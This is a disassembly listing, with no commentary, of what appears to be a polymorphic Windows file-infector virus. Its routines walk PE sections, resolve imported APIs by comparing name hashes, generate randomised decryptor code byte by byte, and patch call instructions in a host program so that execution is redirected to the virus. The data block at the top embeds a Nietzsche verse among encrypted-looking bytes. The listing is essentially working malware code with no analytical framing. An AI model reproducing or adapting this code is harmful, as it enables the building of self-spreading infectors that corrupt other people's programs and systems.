dd 4035FC95h, 90C48100h, 50000001h, 6AD48Bh, 1C95FF52h
dd 85004036h, 0D7559C0h, 138868h, 0BC95FF00h, 0EB004035h
dd 69BD83E2h, 401Dh, 858D2975h, 401D6Dh, 895FF50h, 85004036h
dd 3B840FC0h, 8B000001h, 8B0C40h, 858F30FFh, 401D69h, 384D85C6h
dd 6A010040h, 6A016A00h, 1495FF02h, 83004036h, 840FFFF8h
dd 112h, 65958D93h, 6A00401Dh, 0FF535210h, 40360495h, 0FC08500h
dd 0F285h, 86BD8D00h, 0B100401Dh, 0FABCE808h, 9468FFFFh
dd 5E000000h, 3489E62Bh, 95FF5424h, 403598h, 1D94BD8Dh
dd 1B10040h, 0FFFA9DE8h, 24448BFFh, 8E0C110h, 424440Bh
dd 0B08E0C1h, 50082444h, 5E8h, 362E2500h, 0FF570078h, 40355495h
dd 0CC48300h, 200647C6h, 1D81958Dh, 6A0040h, 2168h, 0FF535200h
dd 40361095h, 247C8D00h, 95FF5714h, 403558h, 0A3804C6h
dd 50006A40h, 95FF5357h, 403610h, 0BD8DE603h, 401DA2h
dd 0C68006Ah, 57000000h, 1095FF53h, 3D004036h, 0Ch, 0B58D4D75h
dd 40364Eh, 384D8D8Dh, 0CE2B0040h, 5651006Ah, 0C95FF53h
dd 83004036h, 2F7E00F8h, 8DFE8B91h, 40364EB5h, 0F20DB000h
dd 601075AEh, 0FFFAF8E8h, 177261FFh, 778D09E3h, 8BEAEB01h
dd 8DCE2BCFh, 40364EBDh, 87A4F300h, 53B9EBF7h, 360095FFh
dd 0BD800040h, 401577h, 682A7401h, 7530h, 35BC95FFh, 0BD800040h
dd 40384Dh, 0C7117400h, 401D6985h, 0
dd 4D85C600h, 4038h, 0FFFE56E9h, 8085C7FFh, 4015h, 5D800000h
dd 0D0004C2h, 6E204F0Ah, 206E6F6Fh, 6C20666Fh, 21656669h
dd 74204F20h, 20656D69h, 63206F74h, 62656C65h, 65746172h
dd 200A0D21h, 20202020h, 7573204Fh, 72656D6Dh, 72616720h
dd 216E6564h, 65520A0Dh, 746E656Ch, 7373656Ch, 6820796Ch
dd 79707061h, 646E6120h, 70786520h, 61746365h, 202C746Eh
dd 6E617473h, 676E6964h, 0D2D203Ah, 7461570Ah, 6E696863h
dd 6C612067h, 6164206Ch, 6E612079h, 696E2064h, 2C746867h
dd 726F6620h, 69726620h, 73646E65h, 77204920h, 3A746961h
dd 68570A0Dh, 20657265h, 20657261h, 2C756F79h, 69726620h
dd 73646E65h, 6F43203Fh, 2021656Dh, 69207449h, 69742073h
dd 2021656Dh, 73277449h, 74616C20h, 0A0D2165h, 4FD479EDh
dd 10A61429h, 30C78404h, 27B1FAE5h, 3AAB5957h, 0A5FADA23h
dd 50B7AB4h, 4B9BAAB9h, 40375248h, 40375232h, 6299AD47h
dd 10A61413h, 354522DFh, 2FF61F75h, 0A70356A8h, 1C9ADB6Eh
dd 53AF69C9h, 72EB0549h, 606EF96Ah, 0B23C03F4h, 0C26CCC5Ch
dd 0D79213BDh, 1A73C17Eh, 0D8B8B352h, 0FC19CA6Eh, 7 dup(0)
; =============== S U B R O U T I N E =======================================
sub_415EA4 proc near ; CODE XREF: sub_415EEB:loc_415F48�p
; sub_415FAB+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr ss:loc_4039AA[ebp], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_415EC0: ; CODE XREF: sub_415EA4+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_415EE2
cmp eax, [edx+8]
jnb short loc_415EE2
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov dword ptr ss:loc_4039AA[ebp], eax
jmp short loc_415EE7
; ---------------------------------------------------------------------------
loc_415EE2: ; CODE XREF: sub_415EA4+23�j
; sub_415EA4+28�j
add edx, 28h
loop loc_415EC0
loc_415EE7: ; CODE XREF: sub_415EA4+3C�j
popa
retn 4
sub_415EA4 endp
; =============== S U B R O U T I N E =======================================
sub_415EEB proc near ; CODE XREF: __u_____:00416217�p
; __u_____:0041623D�p
mov byte ptr ss:dword_4022F7[ebp], al
call sub_415F5A
push 20h
lea eax, dword_402224[ebp]
pop ecx
loc_415F02: ; CODE XREF: sub_415EEB+1E�j
cmp [eax], ebx
jz short loc_415F12
add eax, 4
loop loc_415F02
inc dword ptr ss:loc_40398E[ebp]
retn
; ---------------------------------------------------------------------------
loc_415F12: ; CODE XREF: sub_415EEB+19�j
neg ecx
add ecx, ss:dword_4022F7[ebp]
jecxz short loc_415F2C
loc_415F1C: ; CODE XREF: sub_415EEB+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_415F1C
mov ss:dword_402224[ebp], ebx
loc_415F2C: ; CODE XREF: sub_415EEB+2F�j
; sub_415F5A+34�j
cmp dword ptr [edx], 0
jz short loc_415F36
sub esi, [edx]
add esi, [edx+10h]
loc_415F36: ; CODE XREF: sub_415EEB+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_415F45
push dword ptr [edx]
jmp short loc_415F48
; ---------------------------------------------------------------------------
loc_415F45: ; CODE XREF: sub_415EEB+54�j
push dword ptr [edx+10h]
loc_415F48: ; CODE XREF: sub_415EEB+58�j
call sub_415EA4
sub ecx, esi
sub ecx, dword ptr ss:loc_4039AA[ebp]
pop eax
add ecx, [ebx+34h]
retn
sub_415EEB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415F5A proc near ; CODE XREF: sub_415EEB+6�p
pop dword ptr [ebp+403992h]
mov dword ptr ss:loc_40398E[ebp], 0
call sub_415FAB
mov eax, dword ptr ss:loc_40398E[ebp]
call sub_4156EF
call sub_415F97
cmp dword ptr ss:loc_40398E[ebp], 0
jnz short loc_415F90
mov ss:dword_4022A0[ebp], ebx
jmp short loc_415F2C
; ---------------------------------------------------------------------------
loc_415F90: ; CODE XREF: sub_415F5A+2C�j
dec dword ptr ss:loc_40398E[ebp]
retn
sub_415F5A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415F97 proc near ; CODE XREF: sub_415F5A+20�p
pop dword ptr [ebp+403992h]
mov dword ptr ss:loc_40398E[ebp], edx
call sub_415FAB
xor ecx, ecx
retn
sub_415F97 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415FAB proc near ; CODE XREF: sub_415F5A+10�p
; sub_415F97+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_415EA4
add edx, dword ptr ss:loc_4039AA[ebp]
add edx, esi
loc_415FBF: ; CODE XREF: sub_415FAB+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_4160D0
cmp dword ptr [edx+10h], 0
jz locret_4160D0
mov eax, [edx+0Ch]
push eax
call sub_415EA4
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, esi
push eax
loc_415FE5: ; CODE XREF: sub_415FAB+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_416005
cmp cl, 2Eh
jz short loc_415FF4
loc_415FF1: ; CODE XREF: sub_415FAB+58�j
inc eax
jmp short loc_415FE5
; ---------------------------------------------------------------------------
loc_415FF4: ; CODE XREF: sub_415FAB+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_415FF1
loc_416005: ; CODE XREF: sub_415FAB+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_4160C8
cmp word ptr [eax-2], 3233h
jnz loc_4160C8
push esi
cmp dword ptr [edx], 0
jnz short loc_416028
mov ecx, [edx+10h]
jmp short loc_41602A
; ---------------------------------------------------------------------------
loc_416028: ; CODE XREF: sub_415FAB+76�j
mov ecx, [edx]
loc_41602A: ; CODE XREF: sub_415FAB+7B�j
add esi, ecx
push ecx
call sub_415EA4
add esi, dword ptr ss:loc_4039AA[ebp]
loc_416038: ; CODE XREF: sub_415FAB+90�j
; sub_415FAB+117�j
lodsd
test eax, eax
js short loc_416038
jz loc_4160C7
push dword ptr ss:loc_4039AA[ebp]
push eax
call sub_415EA4
add eax, dword ptr ss:loc_4039AA[ebp]
pop dword ptr ss:loc_4039AA[ebp]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_416064: ; CODE XREF: sub_415FAB+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_41607B
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_416064
; ---------------------------------------------------------------------------
loc_41607B: ; CODE XREF: sub_415FAB+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_4160C1
cmp ebx, 0DB6E45A8h
jz short loc_4160C1
cmp ebx, 0FFA13B59h
jz short loc_4160C1
cmp ebx, 0ACB522D6h
jz short loc_4160C1
cmp ebx, 0F358E993h
jz short loc_4160C1
cmp ebx, 0F358E97Dh
jz short loc_4160C1
cmp ebx, 0E1253F46h
jz short loc_4160C1
cmp ebx, 0E1253F30h
jz short loc_4160C1
call dword ptr [ebp+403992h]
loc_4160C1: ; CODE XREF: sub_415FAB+D6�j
; sub_415FAB+DE�j ...
pop ebx
jmp loc_416038
; ---------------------------------------------------------------------------
loc_4160C7: ; CODE XREF: sub_415FAB+92�j
pop esi
loc_4160C8: ; CODE XREF: sub_415FAB+60�j
; sub_415FAB+6C�j
add edx, 14h
jmp loc_415FBF
; ---------------------------------------------------------------------------
locret_4160D0: ; CODE XREF: sub_415FAB+18�j
; sub_415FAB+22�j
retn
sub_415FAB endp
; ---------------------------------------------------------------------------
db 1
; =============== S U B R O U T I N E =======================================
sub_4160D2 proc near ; CODE XREF: __u_____:00416210�p
; __u_____:00416236�p
push 4
pop eax
call sub_4156EF
mov ss:byte_4024D1[ebp], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_4156EF
add edx, 8
xchg edx, ecx
loc_4160FA: ; CODE XREF: sub_4160D2:loc_416139�j
push 5
pop eax
call sub_4156EF
cmp dl, 3
jnb short loc_416112
mov al, 50h
add al, ss:byte_4024D1[ebp]
stosb
jmp short loc_416139
; ---------------------------------------------------------------------------
loc_416112: ; CODE XREF: sub_4160D2+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_416133
mov al, 11h
call sub_4156EF
mov eax, 1
loc_416127: ; CODE XREF: sub_4160D2+5D�j
test dl, dl
jz short loc_416138
shl eax, 1
dec dl
jmp short loc_416127
; ---------------------------------------------------------------------------
jmp short loc_416138
; ---------------------------------------------------------------------------
loc_416133: ; CODE XREF: sub_4160D2+47�j
mov eax, 80000000h
loc_416138: ; CODE XREF: sub_4160D2+57�j
; sub_4160D2+5F�j
stosd
loc_416139: ; CODE XREF: sub_4160D2+3E�j
loop loc_4160FA
retn
sub_4160D2 endp
; ---------------------------------------------------------------------------
loc_41613C: ; CODE XREF: sub_416B96+112�p
lea edi, loc_40343C[ebp]
test dword ptr [ebp+403431h], 80000000h
jz short loc_416151
mov al, 60h
stosb
loc_416151: ; CODE XREF: __u_____:0041614C�j
test dword ptr [ebp+403431h], 1000003h
jz loc_416257
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0BDCB0D15h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov dword ptr ss:loc_40399A[ebp], edi
jz short loc_4161CF
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_41619A
mov eax, 2E8B6467h
loc_41619A: ; CODE XREF: __u_____:00416193�j
stosd
mov ax, 0
stosw
jz short loc_4161A6
mov al, 5Dh
stosb
loc_4161A6: ; CODE XREF: __u_____:004161A1�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_4161CD
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_4161CD
mov eax, 0F8ED83h
loc_4161CD: ; CODE XREF: __u_____:004161B5�j
; __u_____:004161C6�j
stosd
dec edi
loc_4161CF: ; CODE XREF: __u_____:00416182�j
test dword ptr [ebp+403431h], 3
jz short loc_4161DF
mov al, 0E9h
stosb
stosd
loc_4161DF: ; CODE XREF: __u_____:004161D9�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_416257
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_4160D2
mov al, 20h
call sub_415EEB
jecxz short loc_416257
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_41624A
call sub_4160D2
mov al, 1Fh
call sub_415EEB
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_41624A: ; CODE XREF: __u_____:00416234�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_416257: ; CODE XREF: __u_____:0041615B�j
; __u_____:004161F6�j ...
test dword ptr [ebp+403431h], 4
jz short loc_416275
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_416275: ; CODE XREF: __u_____:00416261�j
test dword ptr [ebp+403431h], 8
jnz short loc_4162CB
cmp byte ptr [ebp+40342Fh], 0
jz short loc_4162CB
mov eax, 0C9291829h
or ah, byte ptr ss:loc_40342B[ebp]
shl ah, 3
or ah, byte ptr ss:loc_40342B[ebp]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, byte ptr ss:loc_40342B[ebp]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_4162C9
mov al, 49h
stosb
mov ax, 0FC75h
loc_4162C9: ; CODE XREF: __u_____:004162C0�j
stosw
loc_4162CB: ; CODE XREF: __u_____:0041627F�j
; __u_____:00416288�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_4162EC
mov al, 58h
or al, [ebp+403429h]
stosb
loc_4162EC: ; CODE XREF: __u_____:004162E1�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_4162FF
add ah, 28h
loc_4162FF: ; CODE XREF: __u_____:004162FA�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_416323
mov al, 50h
add al, [ebp+403429h]
stosb
loc_416323: ; CODE XREF: __u_____:00416318�j
test dword ptr [ebp+403431h], 80h
jnz short loc_41633A
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_416377
; ---------------------------------------------------------------------------
loc_41633A: ; CODE XREF: __u_____:0041632D�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_41634C
mov al, 29h
loc_41634C: ; CODE XREF: __u_____:00416348�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_41636F
mov ah, 0C8h
loc_41636F: ; CODE XREF: __u_____:0041636B�j
or ah, [ebp+40342Ah]
stosw
loc_416377: ; CODE XREF: __u_____:00416338�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_4163FB
test dword ptr [ebp+403431h], 400h
jnz short loc_4163A6
mov al, 0B8h
or al, byte ptr ss:loc_40342B[ebp]
stosb
jmp short loc_4163F3
; ---------------------------------------------------------------------------
loc_4163A6: ; CODE XREF: __u_____:00416399�j
test dword ptr [ebp+403431h], 800h
jnz short loc_4163C3
mov ax, 0E083h
or ah, byte ptr ss:loc_40342B[ebp]
stosw
xor eax, eax
stosb
jmp short loc_4163D8
; ---------------------------------------------------------------------------
loc_4163C3: ; CODE XREF: __u_____:004163B0�j
mov ax, 1829h
or ah, byte ptr ss:loc_40342B[ebp]
shl ah, 3
or ah, byte ptr ss:loc_40342B[ebp]
stosw
loc_4163D8: ; CODE XREF: __u_____:004163C1�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_4163EB
add ah, 8
loc_4163EB: ; CODE XREF: __u_____:004163E6�j
or ah, byte ptr ss:loc_40342B[ebp]
stosw
loc_4163F3: ; CODE XREF: __u_____:004163A4�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_4163FB: ; CODE XREF: __u_____:0041638D�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_416410
mov al, 50h
add al, [ebp+403429h]
stosb
loc_416410: ; CODE XREF: __u_____:00416405�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_416420
add al, 4
loc_416420: ; CODE XREF: __u_____:0041641C�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_41643D
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_41643D: ; CODE XREF: __u_____:00416434�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_41644F
mov ah, 29h
loc_41644F: ; CODE XREF: __u_____:0041644B�j
stosw
mov al, 18h
or al, byte ptr ss:loc_40342B[ebp]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_41646D
mov al, 86h
loc_41646D: ; CODE XREF: __u_____:00416469�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_416481
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_416481: ; CODE XREF: __u_____:00416478�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_416498
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_4164A7
; ---------------------------------------------------------------------------
loc_416498: ; CODE XREF: __u_____:0041648B�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_4164A7: ; CODE XREF: __u_____:00416496�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_4164E2
test dword ptr [ebp+403431h], 40000h
jnz short loc_4164D9
mov al, 0C0h
or al, byte ptr ss:loc_40342B[ebp]
mov ah, byte ptr ss:loc_403430[ebp]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_4164E1
; ---------------------------------------------------------------------------
loc_4164D9: ; CODE XREF: __u_____:004164BD�j
mov al, 40h
or al, byte ptr ss:loc_40342B[ebp]
loc_4164E1: ; CODE XREF: __u_____:004164D7�j
stosb
loc_4164E2: ; CODE XREF: __u_____:004164B1�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_4164FE
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_416506
; ---------------------------------------------------------------------------
loc_4164FE: ; CODE XREF: __u_____:004164EC�j
mov al, 48h
or al, [ebp+40342Ah]
loc_416506: ; CODE XREF: __u_____:004164FC�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_41653A
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_416555
mov cl, 77h
jmp short loc_416555
; ---------------------------------------------------------------------------
loc_41653A: ; CODE XREF: __u_____:00416513�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_416555: ; CODE XREF: __u_____:00416534�j
; __u_____:00416538�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_4165FF
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_416596
mov eax, 2E876467h
loc_416596: ; CODE XREF: __u_____:0041658F�j
stosd
mov eax, 0
stosw
jnz short loc_4165A6
mov ax, 0E58Bh
stosw
loc_4165A6: ; CODE XREF: __u_____:0041659E�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_4165FC
test dword ptr [ebp+403431h], 8000000h
jz short loc_4165EE
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_4165E9
mov ax, 424h
stosw
jmp short loc_4165FC
; ---------------------------------------------------------------------------
loc_4165E9: ; CODE XREF: __u_____:004165DF�j
mov al, 8
stosb
jmp short loc_4165FC
; ---------------------------------------------------------------------------
loc_4165EE: ; CODE XREF: __u_____:004165C6�j
mov ax, 5D58h
add al, byte ptr ss:loc_40342B[ebp]
stosw
jmp short loc_4165FF
; ---------------------------------------------------------------------------
loc_4165FC: ; CODE XREF: __u_____:004165BA�j
; __u_____:004165E7�j ...
mov al, 0C9h
stosb
loc_4165FF: ; CODE XREF: __u_____:00416572�j
; __u_____:004165FA�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_41662B
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_41662B: ; CODE XREF: __u_____:00416609�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_416696
test dword ptr [ebp+403431h], 20000000h
jz short loc_41665C
loc_41664F: ; CODE XREF: __u_____:0041665A�j
test edi, 3
jz short loc_41665C
mov al, 90h
stosb
jmp short loc_41664F
; ---------------------------------------------------------------------------
loc_41665C: ; CODE XREF: __u_____:0041664D�j
; __u_____:00416655�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_41668A
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_416694
; ---------------------------------------------------------------------------
loc_41668A: ; CODE XREF: __u_____:0041667C�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_416694: ; CODE XREF: __u_____:00416688�j
stosw
loc_416696: ; CODE XREF: __u_____:00416641�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_416715
test dword ptr [ebp+403431h], 20000000h
jz short loc_4166BB
loc_4166AE: ; CODE XREF: __u_____:004166B9�j
test edi, 3
jz short loc_4166BB
mov al, 90h
stosb
jmp short loc_4166AE
; ---------------------------------------------------------------------------
loc_4166BB: ; CODE XREF: __u_____:004166AC�j
; __u_____:004166B4�j
mov ecx, edi
mov eax, dword ptr ss:loc_40399A[ebp]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_4166E4
lea eax, [ebp+403429h]
loc_4166DC: ; CODE XREF: __u_____:004166E2�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_4166DC
loc_4166E4: ; CODE XREF: __u_____:004166D4�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_4166F9
mov ax, 0C031h
stosw
loc_4166F9: ; CODE XREF: __u_____:004166F1�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_416712
mov ax, 0C031h
stosw
loc_416712: ; CODE XREF: __u_____:0041670A�j
mov al, 0C3h
stosb
loc_416715: ; CODE XREF: __u_____:004166A0�j
lea eax, loc_40343C[ebp]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_41672D
push edi
sub edi, eax
pop eax
jmp short loc_416746
; ---------------------------------------------------------------------------
loc_41672D: ; CODE XREF: __u_____:00416725�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_416746: ; CODE XREF: __u_____:0041672B�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_416766
neg eax
loc_416766: ; CODE XREF: __u_____:00416762�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_41676A proc near ; CODE XREF: sub_416B96+2A8�p
push esi
push edi
cmp dword ptr ss:loc_4039AE[ebp], 0
jz loc_416952
call near ptr loc_41678A+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_41678A: ; CODE XREF: sub_41676A+F�p
add bh, bh
sub_41676A endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_415EA4
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov dword ptr ss:loc_4039C2[ebp], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_415EA4
mov edi, [ebp+4039A6h]
push esi
call sub_415EA4
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_416952
jz loc_416952
add esi, dword ptr ss:loc_4039AA[ebp]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_416923
loc_416804: ; CODE XREF: sub_416923+29�j
lodsb
cmp al, 0E8h
jnz loc_4168AF
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_415EA4
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_416832
cmp eax, [edi+0Ch]
jnb loc_41694B
jmp short loc_41683E
; ---------------------------------------------------------------------------
loc_416832: ; CODE XREF: sub_416923-FE�j
cmp [ebp+4039A6h], edx
jnz loc_41694B
loc_41683E: ; CODE XREF: sub_416923-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_41694B
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_415EA4
cmp [ebp+4039A6h], edi
jnz loc_41694B
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_41694B
cmp eax, [edi+8]
jnb loc_41694B
loc_416887: ; CODE XREF: sub_416923+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr ss:loc_403548[ebp]
pop edx
test eax, eax
jnz loc_416961
jmp loc_41694B
; ---------------------------------------------------------------------------
loc_4168AF: ; CODE XREF: sub_416923-11C�j
cmp al, 0FFh
jnz loc_41694B
cmp byte ptr [esi], 15h
jnz loc_41694B
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_415EA4
cmp [ebp+4039A6h], edi
jnz short loc_41694B
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, dword ptr ss:loc_4039C2[ebp]
jb short loc_4168F8
cmp eax, [ebp+4039C6h]
jb short loc_416961
loc_4168F8: ; CODE XREF: sub_416923-35�j
cmp eax, 70000000h
jb short loc_416936
call sub_416923
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_416922
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_41693D
; ---------------------------------------------------------------------------
locret_416922: ; CODE XREF: sub_416923-F�j
retn
; END OF FUNCTION CHUNK FOR sub_416923
; =============== S U B R O U T I N E =======================================
sub_416923 proc near ; CODE XREF: sub_416923-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 00416804 SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_415FAB
popa
loc_416936: ; CODE XREF: sub_416923-26�j
test eax, 80000000h
jnz short loc_41694B
loc_41693D: ; CODE XREF: sub_416923-3�j
sub eax, [edi+0Ch]
jb short loc_41694B
cmp eax, [edi+8]
jb loc_416887
loc_41694B: ; CODE XREF: sub_416923-F9�j
; sub_416923-EB�j ...
dec ecx
jnz loc_416804
loc_416952: ; CODE XREF: sub_41676A+9�j
; __u_____:004167EC�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_41699D
; ---------------------------------------------------------------------------
loc_416961: ; CODE XREF: sub_416923-7F�j
; sub_416923-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, dword ptr ss:loc_4039AE[ebp]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_41699D: ; CODE XREF: sub_416923+3C�j
pop edi
pop esi
retn
sub_416923 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4169A0 proc near ; CODE XREF: __u_____:00416B6E�p
; sub_416B96+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr ss:loc_40357C[ebp]
cmp eax, 0FFFFFFFFh
jz locret_416A71
mov dword ptr ss:loc_403952[ebp], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
